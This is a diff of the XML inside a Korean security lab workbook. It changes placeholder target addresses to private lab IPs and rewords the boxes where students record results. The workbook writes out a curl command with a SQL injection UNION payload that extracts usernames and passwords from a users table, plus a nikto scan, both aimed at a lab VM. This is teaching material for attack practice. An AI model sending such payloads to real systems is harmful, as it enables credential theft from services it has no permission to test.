--- a/contents/battle-workbook/secuops-w05.docx
+++ b/contents/battle-workbook/secuops-w05.docx
@@ -107,7 +107,7 @@
           <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
-        <w:t>망 외부 공격자(attacker-ext)</w:t>
+        <w:t>망 외부 공격자(외부 공격자 VM 192.168.0.202)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -189,7 +189,7 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>curl -s "http://&lt;대상_공개IP&gt;:8080/vulnerabilities/sqli/?id=1' UNION SELECT user,password FROM users-- -&amp;Submit=Submit" \</w:t>
+        <w:t>curl -s "http://192.168.0.161:8080/vulnerabilities/sqli/?id=1' UNION SELECT user,password FROM users-- -&amp;Submit=Submit" \</w:t>
         <w:br/>
         <w:t xml:space="preserve">     --cookie "security=low; PHPSESSID=test"</w:t>
       </w:r>
@@ -274,7 +274,7 @@
           <w:b/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>▶ 실행 결과 화면 (스크린샷 붙여넣기)</w:t>
+        <w:t>▶ 실행 결과 (출력/스크린샷)</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -308,7 +308,7 @@
                 <w:color w:val="AAAAAA"/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>여기에 결과 스크린샷을 붙여넣으세요 (커서를 두고 Ctrl+V)</w:t>
+              <w:t>여기에 결과 출력을 적거나 스크린샷을 붙여넣으세요 (커서를 두고 Ctrl+V)</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -425,7 +425,7 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>nikto -h http://&lt;대상_공개IP&gt;:8080 -maxtime 60s</w:t>
+        <w:t>nikto -h http://192.168.0.161:8080 -maxtime 60s</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -508,7 +508,7 @@
           <w:b/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>▶ 실행 결과 화면 (스크린샷 붙여넣기)</w:t>
+        <w:t>▶ 실행 결과 (출력/스크린샷)</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -542,7 +542,7 @@
                 <w:color w:val="AAAAAA"/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>여기에 결과 스크린샷을 붙여넣으세요 (커서를 두고 Ctrl+V)</w:t>
+              <w:t>여기에 결과 출력을 적거나 스크린샷을 붙여넣으세요 (커서를 두고 Ctrl+V)</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -760,7 +760,7 @@
           <w:b/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>▶ 실행 결과 화면 (스크린샷 붙여넣기)</w:t>
+        <w:t>▶ 실행 결과 (출력/스크린샷)</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -794,7 +794,7 @@
                 <w:color w:val="AAAAAA"/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>여기에 결과 스크린샷을 붙여넣으세요 (커서를 두고 Ctrl+V)</w:t>
+              <w:t>여기에 결과 출력을 적거나 스크린샷을 붙여넣으세요 (커서를 두고 Ctrl+V)</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1026,7 +1026,7 @@
           <w:b/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>▶ 실행 결과 화면 (스크린샷 붙여넣기)</w:t>
+        <w:t>▶ 실행 결과 (출력/스크린샷)</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -1060,7 +1060,7 @@
                 <w:color w:val="AAAAAA"/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>여기에 결과 스크린샷을 붙여넣으세요 (커서를 두고 Ctrl+V)</w:t>
+              <w:t>여기에 결과 출력을 적거나 스크린샷을 붙여넣으세요 (커서를 두고 Ctrl+V)</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1267,7 +1267,7 @@
           <w:b/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>▶ 실행 결과 화면 (스크린샷 붙여넣기)</w:t>
+        <w:t>▶ 실행 결과 (출력/스크린샷)</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -1301,7 +1301,7 @@
                 <w:color w:val="AAAAAA"/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>여기에 결과 스크린샷을 붙여넣으세요 (커서를 두고 Ctrl+V)</w:t>
+              <w:t>여기에 결과 출력을 적거나 스크린샷을 붙여넣으세요 (커서를 두고 Ctrl+V)</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1456,7 +1456,7 @@
           <w:b/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>▶ 실행 결과 화면 (스크린샷 붙여넣기)</w:t>
+        <w:t>▶ 실행 결과 (출력/스크린샷)</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -1490,7 +1490,7 @@
                 <w:color w:val="AAAAAA"/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>여기에 결과 스크린샷을 붙여넣으세요 (커서를 두고 Ctrl+V)</w:t>
+              <w:t>여기에 결과 출력을 적거나 스크린샷을 붙여넣으세요 (커서를 두고 Ctrl+V)</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1655,7 +1655,7 @@
           <w:b/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>▶ 실행 결과 화면 (스크린샷 붙여넣기)</w:t>
+        <w:t>▶ 실행 결과 (출력/스크린샷)</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -1689,7 +1689,7 @@
                 <w:color w:val="AAAAAA"/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>여기에 결과 스크린샷을 붙여넣으세요 (커서를 두고 Ctrl+V)</w:t>
+              <w:t>여기에 결과 출력을 적거나 스크린샷을 붙여넣으세요 (커서를 두고 Ctrl+V)</w:t>
             </w:r>
           </w:p>
         </w:tc>
